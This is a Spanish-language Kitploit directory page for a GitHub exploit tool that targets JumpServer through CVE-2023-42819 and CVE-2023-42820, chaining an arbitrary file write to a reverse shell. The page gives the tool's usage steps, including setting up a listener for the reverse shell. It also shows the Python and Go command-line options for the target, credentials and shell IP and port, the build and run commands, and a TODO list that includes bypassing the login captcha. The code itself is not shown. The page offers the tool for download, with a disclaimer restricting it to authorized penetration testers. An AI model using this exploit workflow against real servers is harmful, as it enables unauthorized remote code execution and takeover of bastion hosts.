Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-42819 — CVE-2023-42819 | Kitploit
Herramientas/GitHubGitHub/c1ph3rx13/cve-2023-42819
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónShellcodeExplotación de Aplicaciones WebPruebas de Penetración
GitHubc1ph3rx13/cve-2023-42819

CVE-2023-42819

CVE-2023-42819

Ver Repositorio
63hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-42819

CVE-2023-42819

Descripción de la vulnerabilidad

Vulnerabilidad de escritura arbitraria de archivos en JumpServer

CVE-2023-42819 + CVE-2023-42820 = GetShell

USO

  1. Coloque el script y los archivos necesarios en el mismo directorio

  2. Asegúrese de que Google Chrome esté instalado y obtenga el número de versión de Google Chrome

root@kitploit:~
reg query "HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon" /v version
  1. Descargue chromedriver según la versión correspondiente de Google Chrome y el sistema, y colóquelo en el directorio webdriver

    Versión más reciente: https://googlechromelabs.github.io/chrome-for-testing/

    Versiones anteriores: https://chromedriver.chromium.org/downloads/version-selection

    ¡Cuántos requisitos! : (

  2. Escuche la IP y el puerto correspondientes, y espere la shell reversa

Python Version

root@kitploit:~
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝

                                                                            @Auth: C1ph3rX13
                                                                            @Blog: https://c1ph3rx13.github.io
                                                                            @Note: 代码仅供学习使用,请勿用于其他用途

usage: CVE-2023-42819-Fin.py [-h] -t TARGET -u USERNAME -p PASSWORD --ip IP --port PORT [--proxy PROXY]

CVE-2023-42819 by C1ph3rX13.

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        target url
  -u USERNAME, --username USERNAME
                        account username
  -p PASSWORD, --password PASSWORD
                        account password
  --ip IP               shell ip
  --port PORT           shell port
  --proxy PROXY         proxy to http://ip:port

image-1

image-1

Go Version

Compilación

root@kitploit:~
go mod init CVE-2023-42819
go mod tidy
go build -ldflags="-s -w" -trimpath

Ejecución

root@kitploit:~
.\CVE-2023-42819.exe -t http://IP:Port -u username -p password -ip IP -port Port -proxy proxyUrl
             

        ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗  
        ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
        ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
        ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
        ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
        ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝  
                                                                                                                
    @Auth: C1ph3rX13                                                                                            
    @Blog: https://c1ph3rx13.github.io                                                                          
    @Note: 代码仅供学习使用,请勿用于其他用途                                                                   

Usage of CVE-2023-42819.exe:
  -ip string                                                                  
        Shell IP
  -p string
        Account Password
  -port string
        Shell Port
  -proxy string
        Proxy Url
  -t string
        Target Url
  -u string
        Account Username

image-1

TODO

  • La forma de resolver el problema de CORS no es elegante
  • Reescribir usando httpx
  • Agregar función de EXP
  • Reescribir usando go-resty
  • Bypass del captcha al ingresar contraseña incorrecta durante el inicio de sesión
  • Agregar tipos de shell reversa
  • Usar modo headless para compatibilidad con Linux
  • Agregar proxies http, https, socks
  • CVE-2023-42819 + CVE-2023-42820 GetShell con un solo clic
  • Tantas banderas, tal vez no se pueda completar : (

Mantenimiento

  • 2023-10-18 Agregar detección automática de bypass de sitios web - Python Version
  • 2023-10-18 Refactorizar funciones del cliente
  • 2023-10-18 Simplificar la lógica de ejecución
  • 2023-10-18 Prueba en Linux OK - Go Version

Descargo de responsabilidad

  1. Esta herramienta está destinada únicamente a personal de pruebas de penetración con autorización legítima y a operadores de redes que realizan tareas de mantenimiento rutinarias. Los usuarios pueden descargar, copiar, distribuir o utilizar el software siempre que cuenten con la autorización legal suficiente y no sea para fines comerciales.
  2. Al utilizar esta herramienta, debe asegurarse de que todas sus acciones cumplan con las leyes y regulaciones locales, y no debe utilizar este software para actividades que violen las leyes de la República Popular China. Todos los autores y contribuyentes de esta herramienta no asumen ninguna responsabilidad derivada del uso no autorizado de esta herramienta para actividades ilegales por parte de los usuarios.
Descargar herramienta